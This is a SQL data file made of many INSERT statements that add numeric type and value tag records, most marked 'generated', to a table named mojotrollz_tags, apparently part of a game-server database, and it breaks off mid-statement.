INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9082, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9083, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9083, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9084, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9084, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9085, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9085, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9086, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9086, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9087, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9087, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9096, 1, 1, 229, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9096, 1, 2, 1583, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9096, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9097, 1, 1, 229, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9097, 1, 2, 1583, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9097, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9098, 1, 1, 229, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9098, 1, 2, 1583, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9098, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9099, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9099, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9116, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9116, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9117, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9117, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9118, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9118, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9119, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9119, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9136, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9156, 1, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9156, 1, 2, 1584, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9156, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9157, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9157, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9158, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9162, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9162, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9163, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9163, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9164, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9164, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9165, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9165, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9166, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9166, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9167, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9167, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9176, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9176, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9177, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9177, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9178, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9179, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9179, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9196, 1, 1, 229, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9196, 1, 2, 1583, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9196, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9197, 1, 1, 229, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9197, 1, 2, 1583, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9197, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9198, 1, 1, 229, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9198, 1, 2, 1583, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9198, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9199, 1, 1, 229, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9199, 1, 2, 1583, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9199, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9200, 1, 1, 229, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9200, 1, 2, 1583, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9200, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9201, 1, 1, 229, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9201, 1, 2, 1583, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9201, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9216, 1, 1, 229, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9216, 1, 2, 1583, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9216, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9217, 1, 1, 229, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9217, 1, 2, 1583, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9217, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9218, 1, 1, 229, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9218, 1, 2, 1583, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9218, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9219, 1, 1, 229, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9219, 1, 2, 1583, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9219, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9236, 1, 1, 229, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9236, 1, 2, 1583, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9236, 1, 30, 3, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9237, 1, 1, 229, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9237, 1, 2, 1583, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9237, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9238, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9238, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9239, 1, 1, 229, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9239, 1, 2, 1583, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9239, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9240, 1, 1, 229, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9240, 1, 2, 1583, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9240, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9241, 1, 1, 229, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9241, 1, 2, 1583, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9241, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9256, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9257, 1, 1, 229, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9257, 1, 2, 1583, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9257, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9258, 1, 1, 229, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9258, 1, 2, 1583, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9258, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9259, 1, 1, 229, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9259, 1, 2, 1583, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9259, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9260, 1, 1, 229, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9260, 1, 2, 1583, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9260, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9261, 1, 1, 229, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9261, 1, 2, 1583, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9261, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9262, 1, 1, 229, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9262, 1, 2, 1583, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9262, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9263, 1, 1, 229, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9263, 1, 2, 1583, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9263, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9264, 1, 1, 229, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9264, 1, 2, 1583, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9264, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9265, 1, 1, 229, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9265, 1, 2, 1583, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9265, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9266, 1, 1, 229, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9266, 1, 2, 1583, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9266, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9267, 1, 1, 229, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9267, 1, 2, 1583, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9267, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9268, 1, 1, 229, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9268, 1, 2, 1583, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9268, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9269, 1, 1, 229, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9269, 1, 2, 1583, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9269, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9270, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9270, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9271, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9271, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9272, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9272, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9273, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9273, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9274, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9274, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9296, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9296, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9297, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9298, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9298, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9299, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9299, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9316, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9316, 1, 2, 17, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9316, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9316, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9316, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9317, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9317, 1, 2, 1637, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9317, 1, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9317, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9317, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9317, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9318, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9318, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9319, 1, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9319, 1, 2, 1584, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9319, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9336, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9336, 1, 2, 17, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9336, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9336, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9336, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9356, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9356, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9376, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9376, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9377, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9377, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9396, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9397, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9397, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9398, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9416, 1, 1, 229, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9416, 1, 2, 1583, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9416, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9436, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9437, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9438, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9439, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9441, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9442, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9443, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9445, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9447, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9447, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9448, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9448, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9449, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9449, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9450, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9450, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9451, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9451, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9452, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9452, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9453, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9454, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9454, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9456, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9457, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9458, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9459, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9459, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9460, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9460, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9461, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9462, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9462, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9464, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9464, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9465, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9465, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9467, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9467, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9476, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9477, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9496, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9496, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9498, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9499, 1, 1, 230, 